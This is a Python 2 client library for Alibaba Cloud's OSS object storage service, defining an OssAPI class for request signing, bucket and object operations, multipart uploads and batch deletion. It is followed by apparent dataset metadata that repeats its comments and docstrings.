#!/usr/bin/env python #coding=utf-8 # Copyright (c) 2011, Alibaba Cloud Computing # All rights reserved. # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, dis- # tribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the fol- # lowing conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL- # ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT # SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. import httplib import time import base64 import urllib import StringIO import sys try: from oss.oss_util import * except: from oss_util import * try: from oss.oss_xml_handler import * except: from oss_xml_handler import * class OssAPI: ''' A simple OSS API ''' DefaultContentType = 'application/octet-stream' provider = PROVIDER __version__ = '0.3.2' Version = __version__ AGENT = 'oss-python%s (%s)' % (__version__, sys.platform) def __init__(self, host, access_id, secret_access_key='', port=80, is_security=False): self.SendBufferSize = 8192 self.RecvBufferSize = 1024*1024*10 self.host = get_second_level_domain(host) self.port = port self.access_id = access_id self.secret_access_key = secret_access_key self.show_bar = False self.is_security = is_security self.retry_times = 5 self.agent = self.AGENT self.debug = False def set_debug(self, is_debug): if is_debug: self.debug = True def set_retry_times(self, retry_times=5): self.retry_times = retry_times def set_send_buf_size(self, buf_size): try: self.SendBufferSize = (int)(buf_size) except ValueError: pass def set_recv_buf_size(self, buf_size): try: self.RecvBufferSize = (int)(buf_size) except ValueError: pass def get_connection(self, tmp_host=None): host = '' port = 80 timeout = 10 if not tmp_host: tmp_host = self.host host_port_list = tmp_host.split(":") if len(host_port_list) == 1: host = host_port_list[0].strip() elif len(host_port_list) == 2: host = host_port_list[0].strip() port = int(host_port_list[1].strip()) if self.is_security or port == 443: self.is_security = True if sys.version_info >= (2, 6): return httplib.HTTPSConnection(host=host, port=port, timeout=timeout) else: return httplib.HTTPSConnection(host=host, port=port) else: if sys.version_info >= (2, 6): return httplib.HTTPConnection(host=host, port=port, timeout=timeout) else: return httplib.HTTPConnection(host=host, port=port) def sign_url_auth_with_expire_time(self, method, url, headers=None, resource="/", timeout=60, params=None): ''' Create the authorization for OSS based on the input method, url, body and headers :type method: string :param method: one of PUT, GET, DELETE, HEAD :type url: string :param:HTTP address of bucket or object, eg: http://HOST/bucket/object :type headers: dict :param: HTTP header :type resource: string :param:path of bucket or object, eg: /bucket/ or /bucket/object :type timeout: int :param Returns: signature url. ''' if not headers: headers = {} if not params: params = {} send_time = str(int(time.time()) + timeout) headers['Date'] = send_time auth_value = get_assign(self.secret_access_key, method, headers, resource, None, self.debug) params["OSSAccessKeyId"] = self.access_id params["Expires"] = str(send_time) params["Signature"] = auth_value sign_url = append_param(url, params) return sign_url def sign_url(self, method, bucket, object, timeout=60, headers=None, params=None): ''' Create the authorization for OSS based on the input method, url, body and headers :type method: string :param method: one of PUT, GET, DELETE, HEAD :type bucket: string :param: :type object: string :param: :type timeout: int :param :type headers: dict :param: HTTP header :type params: dict :param: the parameters that put in the url address as query string :type resource: string :param:path of bucket or object, eg: /bucket/ or /bucket/object Returns: signature url. ''' if not headers: headers = {} if not params: params = {} send_time = str(int(time.time()) + timeout) headers['Date'] = send_time if isinstance(object, unicode): object = object.encode('utf-8') resource = "/%s/%s%s" % (bucket, object, get_resource(params)) auth_value = get_assign(self.secret_access_key, method, headers, resource, None, self.debug) params["OSSAccessKeyId"] = self.access_id params["Expires"] = str(send_time) params["Signature"] = auth_value url = '' if self.is_security: if is_ip(self.host): url = "https://%s/%s/%s" % (self.host, bucket, object) else: url = "https://%s.%s/%s" % (bucket, self.host, object) else: if is_ip(self.host): url = "http://%s/%s/%s" % (self.host, bucket, object) else: url = "http://%s.%s/%s" % (bucket, self.host, object) sign_url = append_param(url, params) return sign_url def _create_sign_for_normal_auth(self, method, headers=None, resource="/"): ''' NOT public API Create the authorization for OSS based on header input. it should be put into "Authorization" parameter of header. :type method: string :param:one of PUT, GET, DELETE, HEAD :type headers: dict :param: HTTP header :type resource: string :param:path of bucket or object, eg: /bucket/ or /bucket/object Returns: signature string ''' auth_value = "%s %s:%s" % (self.provider, self.access_id, get_assign(self.secret_access_key, method, headers, resource, None, self.debug)) return auth_value def bucket_operation(self, method, bucket, headers=None, params=None): return self.http_request(method, bucket, '', headers, '', params) def object_operation(self, method, bucket, object, headers=None, body='', params=None): return self.http_request(method, bucket, object, headers, body, params) def http_request(self, method, bucket, object, headers=None, body='', params=None): ''' Send http request of operation :type method: string :param method: one of PUT, GET, DELETE, HEAD, POST :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header :type body: string :param Returns: HTTP Response ''' retry = 5 res = None while retry > 0: retry -= 1 tmp_bucket = bucket tmp_object = object tmp_headers = {} if headers and isinstance(headers, dict): tmp_headers = headers.copy() tmp_params = {} if params and isinstance(params, dict): tmp_params = params.copy() res = self.http_request_with_redirect(method, tmp_bucket, tmp_object, tmp_headers, body, tmp_params) if res.status == 301 or res.status == 302: self.host = helper_get_host_from_resp(res, bucket) else: return res return res def http_request_with_redirect(self, method, bucket, object, headers=None, body='', params=None): ''' Send http request of operation :type method: string :param method: one of PUT, GET, DELETE, HEAD, POST :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header :type body: string :param Returns: HTTP Response ''' if not params: params = {} if not headers: headers = {} if isinstance(object, unicode): object = object.encode('utf-8') if not bucket: resource = "/" headers['Host'] = self.host else: headers['Host'] = "%s.%s" % (bucket, self.host) resource = "/%s/" % bucket resource = "%s%s%s" % (resource.encode('utf-8'), object, get_resource(params)) object = urllib.quote(object) url = "/%s" % object if is_ip(self.host): url = "/%s/%s" % (bucket, object) if not bucket: url = "/%s" % object headers['Host'] = self.host url = append_param(url, params) date = time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime()) headers['Date'] = date headers['Authorization'] = self._create_sign_for_normal_auth(method, headers, resource) headers['User-Agent'] = self.agent if check_bucket_valid(bucket) and not is_ip(self.host): conn = self.get_connection(headers['Host']) else: conn = self.get_connection() conn.request(method, url, body, headers) return conn.getresponse() def get_service(self, headers=None): ''' List all buckets of user ''' return self.list_all_my_buckets(headers) def list_all_my_buckets(self, headers=None): ''' List all buckets of user type headers: dict :param Returns: HTTP Response ''' method = 'GET' bucket = '' object = '' body = '' params = {} return self.http_request(method, bucket, object, headers, body, params) def get_bucket_acl(self, bucket): ''' Get Access Control Level of bucket :type bucket: string :param Returns: HTTP Response ''' method = 'GET' object = '' headers = {} body = '' params = {} params['acl'] = '' return self.http_request(method, bucket, object, headers, body, params) def get_bucket_location(self, bucket): ''' Get Location of bucket ''' method = 'GET' object = '' headers = {} body = '' params = {} params['location'] = '' return self.http_request(method, bucket, object, headers, body, params) def get_bucket(self, bucket, prefix='', marker='', delimiter='', maxkeys='', headers=None): ''' List object that in bucket ''' return self.list_bucket(bucket, prefix, marker, delimiter, maxkeys, headers) def list_bucket(self, bucket, prefix='', marker='', delimiter='', maxkeys='', headers=None): ''' List object that in bucket :type bucket: string :param :type prefix: string :param :type marker: string :param :type delimiter: string :param :type maxkeys: string :param :type headers: dict :param: HTTP header Returns: HTTP Response ''' method = 'GET' object = '' body = '' params = {} params['prefix'] = prefix params['marker'] = marker params['delimiter'] = delimiter params['max-keys'] = maxkeys return self.http_request(method, bucket, object, headers, body, params) def create_bucket(self, bucket, acl='', headers=None): ''' Create bucket ''' return self.put_bucket(bucket, acl, headers) def put_bucket(self, bucket, acl='', headers=None): ''' Create bucket :type bucket: string :param :type acl: string :param: one of private public-read public-read-write :type headers: dict :param: HTTP header Returns: HTTP Response ''' if not headers: headers = {} if acl != '': if "AWS" == self.provider: headers['x-amz-acl'] = acl else: headers['x-oss-acl'] = acl method = 'PUT' object = '' body = '' params = {} return self.http_request(method, bucket, object, headers, body, params) def put_bucket_with_location(self, bucket, acl='', location='', headers=None): ''' Create bucket :type bucket: string :param :type acl: string :param: one of private public-read public-read-write :type location: string :param: :type headers: dict :param: HTTP header Returns: HTTP Response ''' if not headers: headers = {} if acl != '': if "AWS" == self.provider: headers['x-amz-acl'] = acl else: headers['x-oss-acl'] = acl params = {} body = '' if location != '': body = r'<CreateBucketConfiguration>' body += r'<LocationConstraint>' body += location body += r'</LocationConstraint>' body += r'</CreateBucketConfiguration>' method = 'PUT' object = '' return self.http_request(method, bucket, object, headers, body, params) def delete_bucket(self, bucket, headers=None): ''' Delete bucket :type bucket: string :param Returns: HTTP Response ''' method = 'DELETE' object = '' body = '' params = {} return self.http_request(method, bucket, object, headers, body, params) def put_object_with_data(self, bucket, object, input_content, content_type=DefaultContentType, headers=None, params=None): ''' Put object into bucket, the content of object is from input_content ''' return self.put_object_from_string(bucket, object, input_content, content_type, headers, params) def put_object_from_string(self, bucket, object, input_content, content_type=DefaultContentType, headers=None, params=None): ''' Put object into bucket, the content of object is from input_content :type bucket: string :param :type object: string :param :type input_content: string :param :type content_type: string :param: the object content type that supported by HTTP :type headers: dict :param: HTTP header Returns: HTTP Response ''' if not headers: headers = {} headers['Content-Type'] = content_type headers['Content-Length'] = str(len(input_content)) fp = StringIO.StringIO(input_content) res = self.put_object_from_fp(bucket, object, fp, content_type, headers, params) fp.close() return res def _open_conn_to_put_object(self, bucket, object, filesize, content_type=DefaultContentType, headers=None, params=None): ''' NOT public API Open a connectioon to put object :type bucket: string :param :type filesize: int :param :type object: string :param :type input_content: string :param :type content_type: string :param: the object content type that supported by HTTP :type headers: dict :param: HTTP header Returns: Initialized HTTPConnection ''' if not params: params = {} if not headers: headers = {} method = 'PUT' if isinstance(object, unicode): object = object.encode('utf-8') resource = "/%s/" % bucket if not bucket: resource = "/" resource = "%s%s%s" % (resource.encode('utf-8'), object, get_resource(params)) object = urllib.quote(object) url = "/%s" % object if bucket: headers['Host'] = "%s.%s" % (bucket, self.host) else: headers['Host'] = self.host if is_ip(self.host): url = "/%s/%s" % (bucket, object) headers['Host'] = self.host url = append_param(url, params) date = time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime()) if check_bucket_valid(bucket) and not is_ip(self.host): conn = self.get_connection(headers['Host']) else: conn = self.get_connection() conn.putrequest(method, url) if isinstance(content_type, unicode): content_type = content_type.encode('utf-8') headers["Content-Type"] = content_type headers["Content-Length"] = filesize headers["Date"] = date headers["Expect"] = "100-Continue" headers['User-Agent'] = self.agent for k in headers.keys(): conn.putheader(str(k), str(headers[k])) if '' != self.secret_access_key and '' != self.access_id: auth = self._create_sign_for_normal_auth(method, headers, resource) conn.putheader("Authorization", auth) conn.endheaders() return conn def put_object_from_file(self, bucket, object, filename, content_type='', headers=None, params=None): ''' put object into bucket, the content of object is read from file :type bucket: string :param :type object: string :param :type fllename: string :param: the name of the read file :type content_type: string :param: the object content type that supported by HTTP :type headers: dict :param: HTTP header Returns: HTTP Response ''' fp = open(filename, 'rb') if not content_type: content_type = get_content_type_by_filename(filename) res = self.put_object_from_fp(bucket, object, fp, content_type, headers, params) fp.close() return res def view_bar(self, num=1, sum=100): rate = float(num) / float(sum) rate_num = int(rate * 100) print '\r%d%% ' % (rate_num), sys.stdout.flush() def put_object_from_fp(self, bucket, object, fp, content_type=DefaultContentType, headers=None, params=None): ''' Put object into bucket, the content of object is read from file pointer :type bucket: string :param :type object: string :param :type fp: file :param: the pointer of the read file :type content_type: string :param: the object content type that supported by HTTP :type headers: dict :param: HTTP header Returns: HTTP Response ''' tmp_object = object tmp_headers = {} tmp_params = {} if headers and isinstance(headers, dict): tmp_headers = headers.copy() if params and isinstance(params, dict): tmp_params = params.copy() fp.seek(os.SEEK_SET, os.SEEK_END) filesize = fp.tell() fp.seek(os.SEEK_SET) conn = self._open_conn_to_put_object(bucket, object, filesize, content_type, headers, params) totallen = 0 l = fp.read(self.SendBufferSize) retry_times = 0 while len(l) > 0: if retry_times > 100: print "retry too many times" raise try: conn.send(l) retry_times = 0 except: retry_times += 1 continue totallen += len(l) if self.show_bar: self.view_bar(totallen, filesize) l = fp.read(self.SendBufferSize) res = conn.getresponse() if res.status == 301 or res.status == 302: self.host = helper_get_host_from_resp(res, bucket) return self.put_object_from_fp(bucket, tmp_object, fp, content_type, tmp_headers, tmp_params) return res def get_object(self, bucket, object, headers=None, params=None): ''' Get object :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header Returns: HTTP Response ''' method = 'GET' body = '' return self.http_request(method, bucket, object, headers, body, params) def get_object_to_file(self, bucket, object, filename, headers=None): ''' Get object and write the content of object into a file :type bucket: string :param :type object: string :param :type filename: string :param :type headers: dict :param: HTTP header Returns: HTTP Response ''' res = self.get_object(bucket, object, headers) totalread = 0 if res.status / 100 == 2: header = {} header = convert_header2map(res.getheaders()) filesize = safe_get_element("content-length", header) f = file(filename, 'wb') data = '' while True: data = res.read(self.RecvBufferSize) if data: f.write(data) totalread += len(data) if self.show_bar: self.view_bar(totalread, filesize) else: break f.close() # TODO: get object with flow return res def delete_object(self, bucket, object, headers=None): ''' Delete object :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header Returns: HTTP Response ''' method = 'DELETE' body = '' params = {} return self.http_request(method, bucket, object, headers, body, params) def head_object(self, bucket, object, headers=None): ''' Head object, to get the meta message of object without the content :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header Returns: HTTP Response ''' method = 'HEAD' body = '' params = {} return self.http_request(method, bucket, object, headers, body, params) def post_object_group(self, bucket, object, object_group_msg_xml, headers=None, params=None): ''' Post object group, merge all objects in object_group_msg_xml into one object :type bucket: string :param :type object: string :param :type object_group_msg_xml: string :param: xml format string, like <CreateFileGroup> <Part> <PartNumber>N</PartNumber> <FileName>objectN</FileName> <Etag>"47BCE5C74F589F4867DBD57E9CA9F808"</Etag> </Part> </CreateFileGroup> :type headers: dict :param: HTTP header :type params: dict :param: parameters Returns: HTTP Response ''' method = 'POST' if not headers: headers = {} if not params: params = {} if not headers.has_key('Content-Type'): content_type = get_content_type_by_filename(object) headers['Content-Type'] = content_type body = object_group_msg_xml params['group'] = '' headers['Content-Length'] = str(len(body)) return self.http_request(method, bucket, object, headers, body, params) def get_object_group_index(self, bucket, object, headers=None): ''' Get object group_index :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header Returns: HTTP Response ''' if not headers: headers = {} headers["x-oss-file-group"] = '' method = 'GET' body = '' params = {} return self.http_request(method, bucket, object, headers, body, params) def upload_part_from_file_given_pos(self, bucket, object, filename, offset, partsize, upload_id, part_number, headers=None, params=None): if not params: params = {} params['partNumber'] = part_number params['uploadId'] = upload_id content_type = '' return self.put_object_from_file_given_pos(bucket, object, filename, offset, partsize, content_type, headers, params) def put_object_from_file_given_pos(self, bucket, object, filename, offset, partsize, content_type='', headers=None, params=None): ''' Put object into bucket, the content of object is read from given posision of filename :type bucket: string :param :type object: string :param :type fllename: string :param: the name of the read file :type offset: int :param: the given position of file :type partsize: int :param: the size of read content :type content_type: string :param: the object content type that supported by HTTP :type headers: dict :param: HTTP header Returns: HTTP Response ''' tmp_object = object tmp_headers = {} tmp_params = {} if headers and isinstance(headers, dict): tmp_headers = headers.copy() if params and isinstance(params, dict): tmp_params = params.copy() fp = open(filename, 'rb') if offset > os.path.getsize(filename): fp.seek(os.SEEK_SET, os.SEEK_END) else: fp.seek(offset) if not content_type: content_type = get_content_type_by_filename(filename) conn = self._open_conn_to_put_object(bucket, object, partsize, content_type, headers, params) left_len = partsize while True: if left_len <= 0: break elif left_len < self.SendBufferSize: buffer_content = fp.read(left_len) else: buffer_content = fp.read(self.SendBufferSize) if buffer_content: conn.send(buffer_content) left_len = left_len - len(buffer_content) fp.close() res = conn.getresponse() if res.status == 301 or res.status == 302: self.host = helper_get_host_from_resp(res, bucket) return self.put_object_from_file_given_pos(bucket, tmp_object, filename, offset, partsize , content_type, tmp_headers, tmp_params) return res def upload_large_file(self, bucket, object, filename, thread_num=10, max_part_num=1000, headers=None): ''' Upload large file, the content is read from filename. The large file is splitted into many parts. It will put the many parts into bucket and then merge all the parts into one object. :type bucket: string :param :type object: string :param :type fllename: string :param: the name of the read file :type thread_num: int :param :type max_part_num: int :param :type headers: dict :param Returns: HTTP Response ''' #split the large file into 1000 parts or many parts #get part_msg_list if not headers: headers = {} if isinstance(filename, unicode): filename = filename.encode('utf-8') part_msg_list = split_large_file(filename, object, max_part_num) #make sure all the parts are put into same bucket if len(part_msg_list) < thread_num and len(part_msg_list) != 0: thread_num = len(part_msg_list) step = len(part_msg_list) / thread_num retry_times = self.retry_times while(retry_times >= 0): try: threadpool = [] for i in xrange(0, thread_num): if i == thread_num - 1: end = len(part_msg_list) else: end = i * step + step begin = i * step oss = OssAPI(self.host, self.access_id, self.secret_access_key) current = PutObjectGroupWorker(oss, bucket, filename, part_msg_list[begin:end], self.retry_times) threadpool.append(current) current.start() for item in threadpool: item.join() break except: retry_times = retry_times -1 if -1 >= retry_times: print "after retry %s, failed, upload large file failed!" % retry_times return #get xml string that contains msg of object group object_group_msg_xml = create_object_group_msg_xml(part_msg_list) content_type = get_content_type_by_filename(filename) if isinstance(content_type, unicode): content_type = content_type.encode('utf-8') if not headers.has_key('Content-Type'): headers['Content-Type'] = content_type return self.post_object_group(bucket, object, object_group_msg_xml, headers) def copy_object(self, source_bucket, source_object, target_bucket, target_object, headers=None): ''' Copy object :type source_bucket: string :param :type source_object: string :param :type target_bucket: string :param :type target_object: string :param :type headers: dict :param: HTTP header Returns: HTTP Response ''' if not headers: headers = {} if isinstance(source_object, unicode): source_object = source_object.encode('utf-8') source_object = urllib.quote(source_object) headers['x-oss-copy-source'] = "/%s/%s" % (source_bucket, source_object) method = 'PUT' body = '' params = {} return self.http_request(method, target_bucket, target_object, headers, body, params) def init_multi_upload(self, bucket, object, headers=None, params=None): ''' Init multi upload :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header :type params: dict :param: HTTP header Returns: HTTP Response ''' if not params: params = {} method = 'POST' body = '' params['uploads'] = '' return self.http_request(method, bucket, object, headers, body, params) def get_all_parts(self, bucket, object, upload_id, max_parts=None, part_number_marker=None): ''' List all upload parts of given upload_id :type bucket: string :param :type object: string :param :type upload_id: string :param :type max_parts: int :param :type part_number_marker: string :param Returns: HTTP Response ''' method = 'GET' headers = {} body = '' params = {} params['uploadId'] = upload_id if max_parts: params['max-parts'] = max_parts if part_number_marker: params['part-number-marker'] = part_number_marker return self.http_request(method, bucket, object, headers, body, params) def get_all_multipart_uploads(self, bucket, delimiter=None, max_uploads=None, key_marker=None, prefix=None, upload_id_marker=None, headers=None): ''' List all upload_ids and their parts :type bucket: string :param :type delimiter: string :param :type max_uploads: string :param :type key_marker: string :param :type prefix: string :param :type upload_id_marker: string :param :type headers: dict :param: HTTP header Returns: HTTP Response ''' method = 'GET' object = '' body = '' params = {} params['uploads'] = '' if delimiter: params['delimiter'] = delimiter if max_uploads: params['max-uploads'] = max_uploads if key_marker: params['key-marker'] = key_marker if prefix: params['prefix'] = prefix if upload_id_marker: params['upload-id-marker'] = upload_id_marker return self.http_request(method, bucket, object, headers, body, params) def upload_part(self, bucket, object, filename, upload_id, part_number, headers=None, params=None): ''' Upload the content of filename as one part of given upload_id :type bucket: string :param :type object: string :param :type filename: string :param :type upload_id: string :param :type part_number: int :param :type headers: dict :param: HTTP header :type params: dict :param: HTTP header Returns: HTTP Response ''' if not params: params = {} params['partNumber'] = part_number params['uploadId'] = upload_id content_type = '' return self.put_object_from_file(bucket, object, filename, content_type, headers, params) def upload_part_from_string(self, bucket, object, data, upload_id, part_number, headers=None, params=None): ''' Upload the content of string as one part of given upload_id :type bucket: string :param :type object: string :param :type data: string :param :type upload_id: string :param :type part_number: int :param :type headers: dict :param: HTTP header :type params: dict :param: HTTP header Returns: HTTP Response ''' if not params: params = {} params['partNumber'] = part_number params['uploadId'] = upload_id content_type = '' fp = StringIO.StringIO(data) return self.put_object_from_fp(bucket, object, fp, content_type, headers, params) def complete_upload(self, bucket, object, upload_id, part_msg_xml, headers=None, params=None): ''' Finish multiupload and merge all the parts in part_msg_xml as a object. :type bucket: string :param :type object: string :param :type upload_id: string :param :type part_msg_xml: string :param :type headers: dict :param: HTTP header :type params: dict :param: HTTP header Returns: HTTP Response ''' if not headers: headers = {} if not params: params = {} method = 'POST' body = part_msg_xml headers['Content-Length'] = str(len(body)) params['uploadId'] = upload_id if not headers.has_key('Content-Type'): content_type = get_content_type_by_filename(object) headers['Content-Type'] = content_type return self.http_request(method, bucket, object, headers, body, params) def cancel_upload(self, bucket, object, upload_id, headers=None, params=None): ''' Cancel multiupload and delete all parts of given upload_id :type bucket: string :param :type object: string :param :type upload_id: string :param :type headers: dict :param: HTTP header :type params: dict :param: HTTP header Returns: HTTP Response ''' if not params: params = {} method = 'DELETE' if isinstance(upload_id, unicode): upload_id = upload_id.encode('utf-8') params['uploadId'] = upload_id body = '' return self.http_request(method, bucket, object, headers, body, params) def multi_upload_file(self, bucket, object, filename, upload_id='', thread_num=10, max_part_num=10000, headers=None, params=None): ''' Upload large file, the content is read from filename. The large file is splitted into many parts. It will put the many parts into bucket and then merge all the parts into one object. :type bucket: string :param :type object: string :param :type fllename: string :param: the name of the read file :type upload_id: string :param :type thread_num: int :param :type max_part_num: int :param :type headers: dict :param :type params: dict :param Returns: HTTP Response ''' #get init upload_id if not upload_id: res = self.init_multi_upload(bucket, object, headers, params) body = res.read() if res.status == 200: h = GetInitUploadIdXml(body) upload_id = h.upload_id else: err = ErrorXml(body) raise Exception("%s, %s" %(res.status, err.msg)) if not upload_id: raise Exception("-1, Cannot get upload id.") #split the large file into 1000 parts or many parts #get part_msg_list if isinstance(filename, unicode): filename = filename.encode('utf-8') part_msg_list = split_large_file(filename, object, max_part_num) logger = getlogger(self.debug) logger.info("bucket:%s, object:%s, upload_id is: %s, split_number:%d" % (bucket, object, upload_id, len(part_msg_list))) #make sure all the parts are put into same bucket if len(part_msg_list) < thread_num and len(part_msg_list) != 0: thread_num = len(part_msg_list) step = len(part_msg_list) / thread_num #list part to get a map upload_retry_times = self.retry_times while(upload_retry_times >= 0): uploaded_part_map = {} oss = OssAPI(self.host, self.access_id, self.secret_access_key) uploaded_part_map = get_part_map(oss, bucket, object, upload_id) retry_times = self.retry_times while(retry_times >= 0): threadpool = [] try: for i in xrange(0, thread_num): if i == thread_num - 1: end = len(part_msg_list) else: end = i * step + step begin = i * step oss = OssAPI(self.host, self.access_id, self.secret_access_key) current = UploadPartWorker(oss, bucket, object, upload_id, filename, part_msg_list[begin:end], uploaded_part_map, self.retry_times) threadpool.append(current) current.start() for item in threadpool: item.join() break except: retry_times -= 1 if -1 >= retry_times: raise Exception("-2, after retry %s, failed, multi upload part failed! upload_id:%s" % (self.retry_times, upload_id)) #get xml string that contains msg of part part_msg_xml = create_part_xml(part_msg_list) #complete upload res = self.complete_upload(bucket, object, upload_id, part_msg_xml, headers, params) if res.status == 200: break upload_retry_times -= 1 if upload_retry_times < 0: raise Exception("-3, after retry %s, failed, multi upload file failed! upload_id:%s" % (self.retry_times, upload_id)) return res def delete_objects(self, bucket, object_list=None, headers=None, params=None): ''' Batch delete objects :type bucket: string :param: :type object_list: list :param: :type headers: dict :param: HTTP header :type params: dict :param: the parameters that put in the url address as query string Returns: HTTP Response ''' if not object_list: object_list = [] object_list_xml = create_delete_object_msg_xml(object_list) return self.batch_delete_object(bucket, object_list_xml, headers, params) def batch_delete_object(self, bucket, object_list_xml, headers=None, params=None): ''' Delete the objects in object_list_xml :type bucket: string :param: :type object_list_xml: string :param: :type headers: dict :param: HTTP header :type params: dict :param: the parameters that put in the url address as query string Returns: HTTP Response ''' if not headers: headers = {} if not params: params = {} method = 'POST' object = '' body = object_list_xml headers['Content-Length'] = str(len(body)) params['delete'] = '' base64md5 = base64.encodestring(md5.new(body).digest()) if base64md5[-1] == '\n': base64md5 = base64md5[0:-1] headers['Content-MD5'] = base64md5 return self.http_request(method, bucket, object, headers, body, params) def list_objects(self, bucket, prefix=''): ''' :type bucket: string :param: :type prefix: string :param: Returns: a list that contains the objects in bucket with prefix ''' get_instance = GetAllObjects() marker_input = '' object_list = [] oss = OssAPI(self.host, self.access_id, self.secret_access_key) (object_list, marker_output) = get_instance.get_object_in_bucket(oss, bucket, marker_input, prefix) return object_list def batch_delete_objects(self, bucket, object_list=None): ''' :type bucket: string :param: :type object_list: object name list :param: Returns: True or False ''' if not object_list: object_list = [] object_list_xml = create_delete_object_msg_xml(object_list) try: res = self.batch_delete_object(bucket, object_list_xml) if res.status / 100 == 2: return True except: pass return False def get_object_info(self, bucket, object, headers=None, params=None): ''' Get object information :type bucket: string :param: :type object: string :param: :type headers: dict :param: HTTP header :type params: dict :param: the parameters that put in the url address as query string Returns: HTTP Response ''' if not headers: headers = {} if not params: params = {} method = 'GET' body = '' params['objectInfo'] = '' return self.http_request(method, bucket, object, headers, body, params)
en
0.60478
#!/usr/bin/env python #coding=utf-8 # Copyright (c) 2011, Alibaba Cloud Computing # All rights reserved. # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, dis- # tribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the fol- # lowing conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL- # ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT # SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. A simple OSS API Create the authorization for OSS based on the input method, url, body and headers :type method: string :param method: one of PUT, GET, DELETE, HEAD :type url: string :param:HTTP address of bucket or object, eg: http://HOST/bucket/object :type headers: dict :param: HTTP header :type resource: string :param:path of bucket or object, eg: /bucket/ or /bucket/object :type timeout: int :param Returns: signature url. Create the authorization for OSS based on the input method, url, body and headers :type method: string :param method: one of PUT, GET, DELETE, HEAD :type bucket: string :param: :type object: string :param: :type timeout: int :param :type headers: dict :param: HTTP header :type params: dict :param: the parameters that put in the url address as query string :type resource: string :param:path of bucket or object, eg: /bucket/ or /bucket/object Returns: signature url. NOT public API Create the authorization for OSS based on header input. it should be put into "Authorization" parameter of header. :type method: string :param:one of PUT, GET, DELETE, HEAD :type headers: dict :param: HTTP header :type resource: string :param:path of bucket or object, eg: /bucket/ or /bucket/object Returns: signature string Send http request of operation :type method: string :param method: one of PUT, GET, DELETE, HEAD, POST :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header :type body: string :param Returns: HTTP Response Send http request of operation :type method: string :param method: one of PUT, GET, DELETE, HEAD, POST :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header :type body: string :param Returns: HTTP Response List all buckets of user List all buckets of user type headers: dict :param Returns: HTTP Response Get Access Control Level of bucket :type bucket: string :param Returns: HTTP Response Get Location of bucket List object that in bucket List object that in bucket :type bucket: string :param :type prefix: string :param :type marker: string :param :type delimiter: string :param :type maxkeys: string :param :type headers: dict :param: HTTP header Returns: HTTP Response Create bucket Create bucket :type bucket: string :param :type acl: string :param: one of private public-read public-read-write :type headers: dict :param: HTTP header Returns: HTTP Response Create bucket :type bucket: string :param :type acl: string :param: one of private public-read public-read-write :type location: string :param: :type headers: dict :param: HTTP header Returns: HTTP Response Delete bucket :type bucket: string :param Returns: HTTP Response Put object into bucket, the content of object is from input_content Put object into bucket, the content of object is from input_content :type bucket: string :param :type object: string :param :type input_content: string :param :type content_type: string :param: the object content type that supported by HTTP :type headers: dict :param: HTTP header Returns: HTTP Response NOT public API Open a connectioon to put object :type bucket: string :param :type filesize: int :param :type object: string :param :type input_content: string :param :type content_type: string :param: the object content type that supported by HTTP :type headers: dict :param: HTTP header Returns: Initialized HTTPConnection put object into bucket, the content of object is read from file :type bucket: string :param :type object: string :param :type fllename: string :param: the name of the read file :type content_type: string :param: the object content type that supported by HTTP :type headers: dict :param: HTTP header Returns: HTTP Response Put object into bucket, the content of object is read from file pointer :type bucket: string :param :type object: string :param :type fp: file :param: the pointer of the read file :type content_type: string :param: the object content type that supported by HTTP :type headers: dict :param: HTTP header Returns: HTTP Response Get object :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header Returns: HTTP Response Get object and write the content of object into a file :type bucket: string :param :type object: string :param :type filename: string :param :type headers: dict :param: HTTP header Returns: HTTP Response # TODO: get object with flow Delete object :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header Returns: HTTP Response Head object, to get the meta message of object without the content :type bucket: string :param :type object: string :param :type headers: dict :param: HTTP header Returns: HTTP Response Post object group, merge all objects in object_group_msg_xml into one object :type bucket: string :param :type object: string :param :type object_group_msg_xml: string :param: xml format string, like <CreateFileGroup> <Part> <PartNumber>N</PartNumber> <FileName>objectN</FileName> <Etag>"47BCE5C74F589F4867DBD57E9CA9F808"</Etag> </Part> </CreateFileGroup> :type headers: dict :param: HTTP header :type params: dict :param: parameters Returns: HTTP Response Get object 